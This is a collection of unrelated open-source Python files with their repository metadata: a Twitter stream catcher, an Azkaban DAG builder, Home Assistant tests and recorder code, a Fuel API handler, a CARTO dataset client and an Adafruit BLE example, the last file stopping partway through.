def post_to_gateway(self, params, tmp):
if not tmp:
return
params.update({'tweet_data': bson.json_util.dumps(tmp)})
params.update(self.drenaj_auth_secrets)
print params
# TODO: here, error no 111 connection refused exception must be try-catched.
stop_trying = False
exp_backoff_duration = 1
response = None
while not stop_trying:
try:
response = requests.post(self.drenaj_store_url,
data=params)
stop_trying = True
except requests.exceptions.ConnectionError, e:
if exp_backoff_duration > 2**2:
stop_trying = True
# TODO: log this issue at this point.
else:
time.sleep(exp_backoff_duration)
exp_backoff_duration *= 2
if response:
print response.content
def run(self):
self.r = self.requests_session.send(self.filter_request)
while True:
try:
for line in self.r.iter_lines():
print line
self.writefunction(line)
if self.abortEvent.wait(0.0001):
# stop
print "shutting down.."
return 0
# TODO: log these
except httplib.IncompleteRead, e:
print "IncompleteRead exception is catched. We'll restart the connection"
self.filter_request = self.prepare_request(self.postdata, self.keystore)
self.r = self.requests_session.send(self.filter_request)
## contine running
except TypeError, e:
print e
print "Restarting"
self.filter_request = self.prepare_request(self.postdata, self.keystore)
self.r = self.requests_session.send(self.filter_request)
## contine running
except Exception, e:
print e
raise e
threads = []
import signal
def stop_all_threads(signal, frame):
print 'Stopping all threads'
for t in threads:
t.terminate()
sys.exit(0)
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='streamercatcher')
parser.add_argument('campaign_id', help='campaign name')
parser.add_argument('keyword', default='türkiye', help='campaign name')
parser.add_argument('--language')
args = parser.parse_args()
campaign_id = args.campaign_id
if args.language:
lang = args.language
else:
lang = None
user_input = args.keyword
if lang:
postdata = {"track": user_input, "language": lang}
else:
postdata = {"track": user_input}
t = StreamCatcher(
campaign_id=campaign_id,
postdata=postdata)
t.start()
threads.append(t)
signal.signal(signal.SIGINT, stop_all_threads)
signal.pause()
#while True:
# time.sleep(0.5)
|
{
"content_hash": "8ec8f5344521325e0da67b3276b174ea",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 154,
"avg_line_length": 32.38174273858921,
"alnum_prop": 0.5665043567401332,
"repo_name": "boun-cmpe-soslab/drenaj",
"id": "f98afcca14b430235bd2ead52e9a229929b61c68",
"size": "8059",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "drenaj/client/workers/streamcatcher.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "622"
},
{
"name": "HTML",
"bytes": "31311"
},
{
"name": "JavaScript",
"bytes": "24572"
},
{
"name": "Makefile",
"bytes": "150"
},
{
"name": "Python",
"bytes": "257094"
},
{
"name": "Shell",
"bytes": "462"
}
],
"symlink_target": ""
}
|
from os import mkdir
from azflow.Task import Task
from azflow.AzflowException import AzflowException
from collections import deque
class DAG():
""" Define a directed acyclic graph of tasks.
Render tasks as Azkaban jobs, with a final
task representing the DAG as an Azkaban "flow".
"""
def __init__(self, dag_id):
self.dag_id = dag_id
self.tasks = set()
self.flow_task = Task(task_id=self.dag_id, dag=self)
def add_task(self, task):
self.tasks.add(task)
def _prepare_flow(self):
"""The flow_task should come at the end of the DAG,
so it will depend on all tasks which no other task depends on.
"""
for t in self.tasks:
if not t is self.flow_task and not t.downstream:
self.flow_task.set_upstream(t)
def _validate(self):
""" Validate that DAG is acyclic and that the flow_task is last"""
def _contains_cycle(head, ancestors):
""" Perform a DFS, starting from the flow_task and working upstream.
If at any point a node is its own ancestor,
return True.
"""
if head in ancestors:
return True
if head.upstream:
for node in head.upstream:
result = _contains_cycle(node, ancestors+[head])
if result:
return True
return False
if _contains_cycle(self.flow_task, []):
raise AzflowException('Invalid DAG - cycle detected')
if not self.flow_task.upstream:
raise AzflowException('Invalid flow - flow_task detached')
def render_tasks(self, output_directory):
""" Output the necessary .job files to express this DAG
as an Azkaban job flow.
"""
self._prepare_flow()
self._validate()
try:
mkdir(output_directory)
except FileExistsError:
pass
for t in self.tasks:
task_path = output_directory+'/'+t.task_id+'.job'
with open(task_path, 'w') as f:
f.write(t.render())
def print_tasks(self):
""" Use BFS """
self._prepare_flow()
self._validate()
def bfs(node):
to_visit = deque() # queue
visited = set()
to_visit.append((node,0))
to_print = deque() # stack
while to_visit:
current, num_ancestors = to_visit.popleft()
if current not in visited:
to_print.appendleft((current.task_id, num_ancestors))
visited.add(current)
to_visit.extend([(n, num_ancestors+1)
for n in current.upstream
if n not in visited])
max_ancestors = to_print[0][1]
for task_id, num_ancestors in to_print:
print((max_ancestors-num_ancestors)*'<-'+task_id)
bfs(self.flow_task)
|
{
"content_hash": "4f36288497273e66f77f8dda4bc9b03e",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 80,
"avg_line_length": 32.702127659574465,
"alnum_prop": 0.5322055953155498,
"repo_name": "aslotnick/azflow",
"id": "d4c5ac1bea479cf6445fa893e66a05b5d3dfb49a",
"size": "3074",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azflow/DAG.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "4583"
},
{
"name": "Python",
"bytes": "9533"
}
],
"symlink_target": ""
}
|
"""The tests device sun light trigger component."""
# pylint: disable=protected-access
from datetime import datetime
import pytest
from homeassistant.components import (
device_sun_light_trigger,
device_tracker,
group,
light,
)
from homeassistant.components.device_tracker.const import DOMAIN
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_PLATFORM,
EVENT_HOMEASSISTANT_START,
STATE_HOME,
STATE_NOT_HOME,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import CoreState
from homeassistant.setup import async_setup_component
from homeassistant.util import dt as dt_util
from tests.async_mock import patch
from tests.common import async_fire_time_changed
@pytest.fixture
def scanner(hass):
"""Initialize components."""
scanner = getattr(hass.components, "test.device_tracker").get_scanner(None, None)
scanner.reset()
scanner.come_home("DEV1")
getattr(hass.components, "test.light").init()
with patch(
"homeassistant.components.device_tracker.legacy.load_yaml_config_file",
return_value={
"device_1": {
"mac": "DEV1",
"name": "Unnamed Device",
"picture": "http://example.com/dev1.jpg",
"track": True,
"vendor": None,
},
"device_2": {
"mac": "DEV2",
"name": "Unnamed Device",
"picture": "http://example.com/dev2.jpg",
"track": True,
"vendor": None,
},
},
):
assert hass.loop.run_until_complete(
async_setup_component(
hass,
device_tracker.DOMAIN,
{device_tracker.DOMAIN: {CONF_PLATFORM: "test"}},
)
)
assert hass.loop.run_until_complete(
async_setup_component(
hass, light.DOMAIN, {light.DOMAIN: {CONF_PLATFORM: "test"}}
)
)
return scanner
async def test_lights_on_when_sun_sets(hass, scanner):
"""Test lights go on when there is someone home and the sun sets."""
test_time = datetime(2017, 4, 5, 1, 2, 3, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=test_time):
assert await async_setup_component(
hass, device_sun_light_trigger.DOMAIN, {device_sun_light_trigger.DOMAIN: {}}
)
await hass.services.async_call(
light.DOMAIN,
light.SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "test.light"},
blocking=True,
)
test_time = test_time.replace(hour=3)
with patch("homeassistant.util.dt.utcnow", return_value=test_time):
async_fire_time_changed(hass, test_time)
await hass.async_block_till_done()
assert all(
hass.states.get(ent_id).state == STATE_ON
for ent_id in hass.states.async_entity_ids("light")
)
async def test_lights_turn_off_when_everyone_leaves(hass):
"""Test lights turn off when everyone leaves the house."""
assert await async_setup_component(
hass, "light", {light.DOMAIN: {CONF_PLATFORM: "test"}}
)
await hass.services.async_call(
light.DOMAIN,
light.SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "test.light"},
blocking=True,
)
hass.states.async_set("device_tracker.bla", STATE_HOME)
assert await async_setup_component(
hass, device_sun_light_trigger.DOMAIN, {device_sun_light_trigger.DOMAIN: {}}
)
hass.states.async_set("device_tracker.bla", STATE_NOT_HOME)
await hass.async_block_till_done()
assert all(
hass.states.get(ent_id).state == STATE_OFF
for ent_id in hass.states.async_entity_ids("light")
)
async def test_lights_turn_on_when_coming_home_after_sun_set(hass, scanner):
"""Test lights turn on when coming home after sun set."""
test_time = datetime(2017, 4, 5, 3, 2, 3, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=test_time):
await hass.services.async_call(
light.DOMAIN, light.SERVICE_TURN_OFF, {ATTR_ENTITY_ID: "all"}, blocking=True
)
assert await async_setup_component(
hass, device_sun_light_trigger.DOMAIN, {device_sun_light_trigger.DOMAIN: {}}
)
hass.states.async_set(f"{DOMAIN}.device_2", STATE_HOME)
await hass.async_block_till_done()
assert all(
hass.states.get(ent_id).state == light.STATE_ON
for ent_id in hass.states.async_entity_ids("light")
)
async def test_lights_turn_on_when_coming_home_after_sun_set_person(hass, scanner):
"""Test lights turn on when coming home after sun set."""
device_1 = f"{DOMAIN}.device_1"
device_2 = f"{DOMAIN}.device_2"
test_time = datetime(2017, 4, 5, 3, 2, 3, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=test_time):
await hass.services.async_call(
light.DOMAIN, light.SERVICE_TURN_OFF, {ATTR_ENTITY_ID: "all"}, blocking=True
)
hass.states.async_set(device_1, STATE_NOT_HOME)
hass.states.async_set(device_2, STATE_NOT_HOME)
await hass.async_block_till_done()
assert all(
not light.is_on(hass, ent_id)
for ent_id in hass.states.async_entity_ids("light")
)
assert hass.states.get(device_1).state == "not_home"
assert hass.states.get(device_2).state == "not_home"
assert await async_setup_component(
hass,
"person",
{"person": [{"id": "me", "name": "Me", "device_trackers": [device_1]}]},
)
await group.Group.async_create_group(hass, "person_me", ["person.me"])
assert await async_setup_component(
hass,
device_sun_light_trigger.DOMAIN,
{device_sun_light_trigger.DOMAIN: {"device_group": "group.person_me"}},
)
assert all(
hass.states.get(ent_id).state == STATE_OFF
for ent_id in hass.states.async_entity_ids("light")
)
assert hass.states.get(device_1).state == "not_home"
assert hass.states.get(device_2).state == "not_home"
assert hass.states.get("person.me").state == "not_home"
# Unrelated device has no impact
hass.states.async_set(device_2, STATE_HOME)
await hass.async_block_till_done()
assert all(
hass.states.get(ent_id).state == STATE_OFF
for ent_id in hass.states.async_entity_ids("light")
)
assert hass.states.get(device_1).state == "not_home"
assert hass.states.get(device_2).state == "home"
assert hass.states.get("person.me").state == "not_home"
# person home switches on
hass.states.async_set(device_1, STATE_HOME)
await hass.async_block_till_done()
await hass.async_block_till_done()
assert all(
hass.states.get(ent_id).state == light.STATE_ON
for ent_id in hass.states.async_entity_ids("light")
)
assert hass.states.get(device_1).state == "home"
assert hass.states.get(device_2).state == "home"
assert hass.states.get("person.me").state == "home"
async def test_initialize_start(hass):
"""Test we initialize when HA starts."""
hass.state = CoreState.not_running
assert await async_setup_component(
hass,
device_sun_light_trigger.DOMAIN,
{device_sun_light_trigger.DOMAIN: {}},
)
with patch(
"homeassistant.components.device_sun_light_trigger.activate_automation"
) as mock_activate:
hass.bus.fire(EVENT_HOMEASSISTANT_START)
await hass.async_block_till_done()
assert len(mock_activate.mock_calls) == 1
|
{
"content_hash": "50ef2c95aa549adfc18c9886a5a6970a",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 88,
"avg_line_length": 32.80508474576271,
"alnum_prop": 0.609015758202015,
"repo_name": "tchellomello/home-assistant",
"id": "19715577e2ae13cd744fd5ed39ad7845446f6f07",
"size": "7742",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "tests/components/device_sun_light_trigger/test_init.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "26713364"
},
{
"name": "Shell",
"bytes": "4528"
}
],
"symlink_target": ""
}
|
from nailgun.api.v1.handlers.base import DBSingletonHandler
from nailgun.api.v1.validators.master_node_settings \
import MasterNodeSettingsValidator
from nailgun import objects
class MasterNodeSettingsHandler(DBSingletonHandler):
single = objects.MasterNodeSettings
validator = MasterNodeSettingsValidator
not_found_error = "Settings are not found in DB"
|
{
"content_hash": "4720c3d24b752c2590c47ccc1177dd67",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 59,
"avg_line_length": 26.928571428571427,
"alnum_prop": 0.8063660477453581,
"repo_name": "zhaochao/fuel-web",
"id": "a5800a4dae2f83e7a5a7e0c7d95fbf802fba1802",
"size": "987",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nailgun/nailgun/api/v1/handlers/master_node_settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "109800"
},
{
"name": "HTML",
"bytes": "16017"
},
{
"name": "JavaScript",
"bytes": "705662"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Puppet",
"bytes": "282"
},
{
"name": "Python",
"bytes": "3493678"
},
{
"name": "Ruby",
"bytes": "33590"
},
{
"name": "Shell",
"bytes": "26585"
}
],
"symlink_target": ""
}
|
import os
import time
import requests
from .utils import ResponseStream
from .exceptions import CartoException
VALID_TYPES = [
'STRING', 'BYTES', 'INTEGER', 'INT64', 'FLOAT',
'FLOAT64', 'BOOLEAN', 'BOOL', 'TIMESTAMP', 'DATE', 'TIME',
'DATETIME', 'GEOMETRY'
]
TYPES_MAPPING = {
'GEOMETRY': 'GEOGRAPHY'
}
DATASETS_BASE_PATH = 'api/v4/data/observatory/user/datasets'
ENRICHMENT_BASE_PATH = 'api/v4/data/observatory/enrichment'
METADATA_BASE_PATH = 'api/v4/data/observatory/metadata'
class _DODatasetClient:
def __init__(self, auth_client):
self.auth_client = auth_client
self.api_key = getattr(self.auth_client, 'api_key', None)
def upload(self, dataframe, name, params=None):
params = params or {}
dataframe.to_csv(path_or_buf=name, index=False)
try:
with open(name, 'rb') as f:
return self.upload_file_object(f, name, params)
finally:
os.remove(name)
def upload_file_object(self, file_object, name, params=None):
params = params or {}
params['api_key'] = self.api_key
relative_path = '{}/{}'.format(DATASETS_BASE_PATH, name)
try:
response = self.auth_client.send(relative_path, 'POST', params=params, data=file_object)
response.raise_for_status()
except requests.HTTPError as e:
if 400 <= response.status_code < 500:
reason = response.json()['errors'][0]
error_msg = u'%s Client Error: %s' % (response.status_code, reason)
raise CartoException(error_msg)
raise CartoException(e)
except Exception as e:
raise CartoException(e)
return response
def import_dataset(self, name):
params = {'api_key': self.api_key}
relative_path = '{}/{}/imports'.format(DATASETS_BASE_PATH, name)
try:
response = self.auth_client.send(relative_path, 'POST', params=params)
response.raise_for_status()
job = response.json()
return DODatasetJob(job['item_queue_id'], name, self.auth_client)
except requests.HTTPError as e:
if 400 <= response.status_code < 500:
reason = response.json()['errors'][0]
error_msg = u'%s Client Error: %s' % (response.status_code, reason)
raise CartoException(error_msg)
raise CartoException(e)
except Exception as e:
raise CartoException(e)
def upload_dataframe(self, dataframe, name, params=None):
params = params or {}
self.upload(dataframe, name, params)
job = self.import_dataset(name)
status = job.result()
return status
def download(self, name_id, limit=None, order_by=None, sql_query=None, add_geom=None, is_geography=None):
params = {
'api_key': self.api_key
}
if limit is not None:
params['limit'] = limit
if order_by is not None:
params['order_by'] = order_by
if sql_query is not None:
params['sql_query'] = sql_query
if add_geom is not None:
params['add_geom'] = add_geom
if is_geography is not None:
params['is_geography'] = is_geography
relative_path = '{}/{}'.format(DATASETS_BASE_PATH, name_id)
try:
response = self.auth_client.send(relative_path, 'GET', params=params, stream=True)
response.raise_for_status()
except requests.HTTPError as e:
if 400 <= response.status_code < 500:
# Client error, provide better reason
reason = response.json()['errors'][0]
error_msg = u'%s Client Error: %s' % (response.status_code, reason)
raise CartoException(error_msg)
raise CartoException(e)
except Exception as e:
raise CartoException(e)
return response
def download_stream(self, name_id, limit=None, order_by=None, sql_query=None, add_geom=None, is_geography=None):
return ResponseStream(self.download(name_id,
limit=limit,
order_by=order_by,
sql_query=sql_query,
add_geom=add_geom,
is_geography=is_geography))
def create(self, payload):
params = {'api_key': self.api_key}
relative_path = DATASETS_BASE_PATH
try:
response = self.auth_client.send(relative_path, 'POST', params=params, json=payload)
response.raise_for_status()
except requests.HTTPError as e:
if 400 <= response.status_code < 500:
# Client error, provide better reason
reason = response.json()['errors'][0]
error_msg = u'%s Client Error: %s' % (response.status_code, reason)
raise CartoException(error_msg)
else:
raise CartoException(e)
except Exception as e:
raise CartoException(e)
return response
def enrichment(self, payload):
params = {'api_key': self.api_key}
relative_path = ENRICHMENT_BASE_PATH
try:
response = self.auth_client.send(relative_path, 'POST', params=params, json=payload)
response.raise_for_status()
body = response.json()
job = DOEnrichmentJob(body['job_id'], self.auth_client)
status = job.result()
return status
except requests.HTTPError as e:
if 400 <= response.status_code < 500:
# Client error, provide better reason
reason = response.json()['errors'][0]
error_msg = u'%s Client Error: %s' % (response.status_code, reason)
raise CartoException(error_msg)
raise CartoException(e)
except Exception as e:
raise CartoException(e)
def metadata(self, entity, filters):
params = {'api_key': self.api_key}
if filters is not None:
params.update(filters)
relative_path = '{}/{}'.format(METADATA_BASE_PATH, entity)
try:
response = self.auth_client.send(relative_path, 'GET', params=params)
response.raise_for_status()
return response.json()
except requests.HTTPError as e:
if 400 <= response.status_code < 500:
# Client error, provide better reason
reason = response.json()['errors'][0]
error_msg = u'%s Client Error: %s' % (response.status_code, reason)
raise CartoException(error_msg)
else:
raise CartoException(e)
except Exception as e:
raise CartoException(e)
class DODatasetJob:
def __init__(self, job_id, name_id, auth_client):
self.id = job_id
self.name = name_id
self.auth_client = auth_client
self.api_key = getattr(self.auth_client, 'api_key', None)
def status(self):
params = {'api_key': self.api_key}
relative_path = '{}/{}/imports/{}'.format(DATASETS_BASE_PATH, self.name, self.id)
try:
response = self.auth_client.send(relative_path, 'GET', params=params)
response.raise_for_status()
body = response.json()
if body['status'] == 'failure':
msg = u'Client Error: %s' % (body['errors'][0])
raise CartoException(msg)
return body['status']
except requests.HTTPError as e:
if 400 <= response.status_code < 500:
# Client error, provide better reason
reason = response.json()['errors'][0]
error_msg = u'%s Client Error: %s' % (response.status_code, reason)
raise CartoException(error_msg)
raise CartoException(e)
except Exception as e:
raise CartoException(e)
def result(self):
status = self.status()
while status not in ('success', 'failure'):
time.sleep(1)
status = self.status()
return status
class DOEnrichmentJob:
def __init__(self, job_id, auth_client):
self.id = job_id
self.auth_client = auth_client
self.api_key = getattr(self.auth_client, 'api_key', None)
def status(self):
params = {'api_key': self.api_key}
relative_path = '{}/{}/status'.format(ENRICHMENT_BASE_PATH, self.id)
try:
response = self.auth_client.send(relative_path, 'GET', params=params)
response.raise_for_status()
body = response.json()
if body['status'] == 'failure':
msg = u'Client Error: %s' % (body['errors'][0])
raise CartoException(msg)
return body['status']
except requests.HTTPError as e:
if 400 <= response.status_code < 500:
# Client error, provide better reason
reason = response.json()['errors'][0]
error_msg = u'%s Client Error: %s' % (response.status_code, reason)
raise CartoException(error_msg)
raise CartoException(e)
except Exception as e:
raise CartoException(e)
def result(self):
status = self.status()
while status not in ('success', 'failure'):
time.sleep(1)
status = self.status()
return status
class DODataset:
def __init__(self, name=None, columns=None, ttl_seconds=None, client=None, auth_client=None):
self._name = name
self._columns = columns or []
self._ttl_seconds = ttl_seconds
self._client = client or _DODatasetClient(auth_client)
@staticmethod
def _map_type(in_type):
if in_type in TYPES_MAPPING:
out_type = TYPES_MAPPING[in_type]
else:
out_type = in_type
return out_type
def name(self, name):
self._name = name
return self
def column(self, name=None, type=None):
# TODO validate field names
type = type.upper()
if type not in VALID_TYPES:
# TODO custom exception
raise Exception('Invalid type %s' % type)
self._columns.append((name, type))
return self
def ttl_seconds(self, ttl_seconds):
self._ttl_seconds = ttl_seconds
return self
def create(self):
payload = {
'id': self._name,
'schema': [{'name': c[0], 'type': self._map_type(c[1])} for c in self._columns],
}
if self._ttl_seconds is not None:
payload['ttl_seconds'] = self._ttl_seconds
self._client.create(payload)
def download_stream(self, limit=None, order_by=None, sql_query=None, add_geom=None, is_geography=None):
return self._client.download_stream(name_id=self._name,
limit=limit,
order_by=order_by,
sql_query=sql_query,
add_geom=add_geom,
is_geography=is_geography)
def upload(self, dataframe, geom_column=None):
return self._client.upload(dataframe, self._name, params={'geom_column': geom_column})
def upload_file_object(self, file_object, geom_column=None):
return self._client.upload_file_object(file_object, self._name, params={'geom_column': geom_column})
def import_dataset(self):
return self._client.import_dataset(self._name)
def upload_dataframe(self, dataframe, geom_column=None):
return self._client.upload_dataframe(dataframe, self._name, params={'geom_column': geom_column})
def enrichment(self, geom_type='points', variables=None, filters=None, aggregation=None, output_name=None):
payload = {
'type': geom_type,
'input': self._name,
'variables': variables,
'filters': filters,
'aggregation': aggregation,
'output': output_name
}
return self._client.enrichment(payload)
def metadata(self, entity, filters):
return self._client.metadata(entity, filters)
|
{
"content_hash": "ba0fb08d488b01b8c2c64840ae13bb8b",
"timestamp": "",
"source": "github",
"line_count": 354,
"max_line_length": 116,
"avg_line_length": 35.217514124293785,
"alnum_prop": 0.5565893960054544,
"repo_name": "CartoDB/cartodb-python",
"id": "780509e7af66ad164ebf7aa348617047fdc0398a",
"size": "12467",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "carto/do_dataset.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "150677"
}
],
"symlink_target": ""
}
|
import Adafruit_BluefruitLE
from Adafruit_BluefruitLE.services import UART, DeviceInformation
# Get the BLE provider for the current platform.
ble = Adafruit_BluefruitLE.get_provider()
# Main function implements the program logic so it can run in a background
# thread. Most platforms require the main thread to handle GUI events and other
# asyncronous events like BLE actions. All of the threading logic is taken care
# of automatically though and you just need to provide a main function that uses
# the BLE provider.
def main():
# Clear any cached data because both bluez and CoreBluetooth have issues with
# caching data and it going stale.
ble.clear_cached_data()
# Get the first available BLE network adapter and make sure it's powered on.
adapter = ble.get_default_adapter()
adapter.power_on()
print('Using adapter: {0}'.format(adapter.name))
# Disconnect any currently connected UART devices. Good for cleaning up and
# starting from a fresh state.
print('Disconnecting any connected UART devices...')
UART.disconnect_devices()
# Scan for UART devices.
print('Searching for UART device...')
try:
adapter.start_scan()
# Search for the first UART device found (will time out after 60 seconds
# but you can specify an optional timeout_sec parameter to change it).
device = UART.find_device()
if device is None:
raise RuntimeError('Failed to find UART device!')
finally:
# Make sure scanning is stopped before exiting.
adapter.stop_scan()
print('Connecting to device...')
device.connect() # Will time out after 60 seconds, specify timeout_sec parameter
# to change the timeout.
# Once connected do everything else in a try/finally to make sure the device
# is disconnected when done.
try:
# Wait for service discovery to complete for the DIS service. Will
# time out after 60 seconds (specify timeout_sec parameter to override).
print('Discovering services...')
DeviceInformation.discover(device)
# Once service discovery is complete create an instance of the service
# and start interacting with it.
dis = DeviceInformation(device)
# Print out the DIS characteristics.
print('Manufacturer: {0}'.format(dis.manufacturer))
print('Model: {0}'.format(dis.model))
print('Serial: {0}'.format(dis.serial))
print('Hardware Revision: {0}'.format(dis.hw_revision))
print('Software Revision: {0}'.format(dis.sw_revision))
print('Firmware Revision: {0}'.format(dis.fw_revision))
print('System ID: {0}'.format(dis.system_id))
print('Regulatory Cert: {0}'.format(dis.regulatory_cert))
print('PnP ID: {0}'.format(dis.pnp_id))
finally:
# Make sure device is disconnected on exit.
device.disconnect()
# Initialize the BLE system. MUST be called before other BLE calls!
ble.initialize()
# Start the mainloop to process BLE events, and run the provided function in
# a background thread. When the provided main function stops running, returns
# an integer status code, or throws an error the program will exit.
ble.run_mainloop_with(main)
|
{
"content_hash": "d5ecfca81938c358b9e4a0a931dbd851",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 85,
"avg_line_length": 41.43037974683544,
"alnum_prop": 0.689275893675527,
"repo_name": "adafruit/Adafruit_Python_BluefruitLE",
"id": "bf735c505e50f9bd718cd4ecf28192d046db8c03",
"size": "3519",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/device_info.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "103116"
}
],
"symlink_target": ""
}
|
"""Support for recording details."""
import asyncio
from collections import namedtuple
import concurrent.futures
from datetime import datetime, timedelta
import logging
import queue
from sqlite3 import Connection
import threading
import time
from typing import Any, Dict, Optional
from sqlalchemy import create_engine, exc
from sqlalchemy.engine import Engine
from sqlalchemy.event import listens_for
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.pool import StaticPool
import voluptuous as vol
from homeassistant.components import persistent_notification
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_DOMAINS,
CONF_ENTITIES,
CONF_EXCLUDE,
CONF_INCLUDE,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
MATCH_ALL,
)
from homeassistant.core import CoreState, HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entityfilter import generate_filter
from homeassistant.helpers.typing import ConfigType
import homeassistant.util.dt as dt_util
from . import migration, purge
from .const import DATA_INSTANCE
from .models import Base, Events, RecorderRuns, States
from .util import session_scope
_LOGGER = logging.getLogger(__name__)
DOMAIN = "recorder"
SERVICE_PURGE = "purge"
ATTR_KEEP_DAYS = "keep_days"
ATTR_REPACK = "repack"
SERVICE_PURGE_SCHEMA = vol.Schema(
{
vol.Optional(ATTR_KEEP_DAYS): vol.All(vol.Coerce(int), vol.Range(min=0)),
vol.Optional(ATTR_REPACK, default=False): cv.boolean,
}
)
DEFAULT_URL = "sqlite:///{hass_config_path}"
DEFAULT_DB_FILE = "home-assistant_v2.db"
DEFAULT_DB_MAX_RETRIES = 10
DEFAULT_DB_RETRY_WAIT = 3
CONF_DB_URL = "db_url"
CONF_DB_MAX_RETRIES = "db_max_retries"
CONF_DB_RETRY_WAIT = "db_retry_wait"
CONF_PURGE_KEEP_DAYS = "purge_keep_days"
CONF_PURGE_INTERVAL = "purge_interval"
CONF_EVENT_TYPES = "event_types"
FILTER_SCHEMA = vol.Schema(
{
vol.Optional(CONF_EXCLUDE, default={}): vol.Schema(
{
vol.Optional(CONF_DOMAINS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_ENTITIES): cv.entity_ids,
vol.Optional(CONF_EVENT_TYPES): vol.All(cv.ensure_list, [cv.string]),
}
),
vol.Optional(CONF_INCLUDE, default={}): vol.Schema(
{
vol.Optional(CONF_DOMAINS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_ENTITIES): cv.entity_ids,
}
),
}
)
CONFIG_SCHEMA = vol.Schema(
{
vol.Optional(DOMAIN, default=dict): FILTER_SCHEMA.extend(
{
vol.Optional(CONF_PURGE_KEEP_DAYS, default=10): vol.All(
vol.Coerce(int), vol.Range(min=1)
),
vol.Optional(CONF_PURGE_INTERVAL, default=1): vol.All(
vol.Coerce(int), vol.Range(min=0)
),
vol.Optional(CONF_DB_URL): cv.string,
vol.Optional(
CONF_DB_MAX_RETRIES, default=DEFAULT_DB_MAX_RETRIES
): cv.positive_int,
vol.Optional(
CONF_DB_RETRY_WAIT, default=DEFAULT_DB_RETRY_WAIT
): cv.positive_int,
}
)
},
extra=vol.ALLOW_EXTRA,
)
def run_information(hass, point_in_time: Optional[datetime] = None):
"""Return information about current run.
There is also the run that covers point_in_time.
"""
ins = hass.data[DATA_INSTANCE]
recorder_runs = RecorderRuns
if point_in_time is None or point_in_time > ins.recording_start:
return ins.run_info
with session_scope(hass=hass) as session:
res = (
session.query(recorder_runs)
.filter(
(recorder_runs.start < point_in_time)
& (recorder_runs.end > point_in_time)
)
.first()
)
if res:
session.expunge(res)
return res
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the recorder."""
conf = config[DOMAIN]
keep_days = conf.get(CONF_PURGE_KEEP_DAYS)
purge_interval = conf.get(CONF_PURGE_INTERVAL)
db_max_retries = conf[CONF_DB_MAX_RETRIES]
db_retry_wait = conf[CONF_DB_RETRY_WAIT]
db_url = conf.get(CONF_DB_URL, None)
if not db_url:
db_url = DEFAULT_URL.format(hass_config_path=hass.config.path(DEFAULT_DB_FILE))
include = conf.get(CONF_INCLUDE, {})
exclude = conf.get(CONF_EXCLUDE, {})
instance = hass.data[DATA_INSTANCE] = Recorder(
hass=hass,
keep_days=keep_days,
purge_interval=purge_interval,
uri=db_url,
db_max_retries=db_max_retries,
db_retry_wait=db_retry_wait,
include=include,
exclude=exclude,
)
instance.async_initialize()
instance.start()
async def async_handle_purge_service(service):
"""Handle calls to the purge service."""
instance.do_adhoc_purge(**service.data)
hass.services.async_register(
DOMAIN, SERVICE_PURGE, async_handle_purge_service, schema=SERVICE_PURGE_SCHEMA
)
return await instance.async_db_ready
PurgeTask = namedtuple("PurgeTask", ["keep_days", "repack"])
class Recorder(threading.Thread):
"""A threaded recorder class."""
def __init__(
self,
hass: HomeAssistant,
keep_days: int,
purge_interval: int,
uri: str,
db_max_retries: int,
db_retry_wait: int,
include: Dict,
exclude: Dict,
) -> None:
"""Initialize the recorder."""
threading.Thread.__init__(self, name="Recorder")
self.hass = hass
self.keep_days = keep_days
self.purge_interval = purge_interval
self.queue: Any = queue.Queue()
self.recording_start = dt_util.utcnow()
self.db_url = uri
self.db_max_retries = db_max_retries
self.db_retry_wait = db_retry_wait
self.async_db_ready = asyncio.Future()
self.engine: Any = None
self.run_info: Any = None
self.entity_filter = generate_filter(
include.get(CONF_DOMAINS, []),
include.get(CONF_ENTITIES, []),
exclude.get(CONF_DOMAINS, []),
exclude.get(CONF_ENTITIES, []),
)
self.exclude_t = exclude.get(CONF_EVENT_TYPES, [])
self.get_session = None
@callback
def async_initialize(self):
"""Initialize the recorder."""
self.hass.bus.async_listen(MATCH_ALL, self.event_listener)
def do_adhoc_purge(self, **kwargs):
"""Trigger an adhoc purge retaining keep_days worth of data."""
keep_days = kwargs.get(ATTR_KEEP_DAYS, self.keep_days)
repack = kwargs.get(ATTR_REPACK)
self.queue.put(PurgeTask(keep_days, repack))
def run(self):
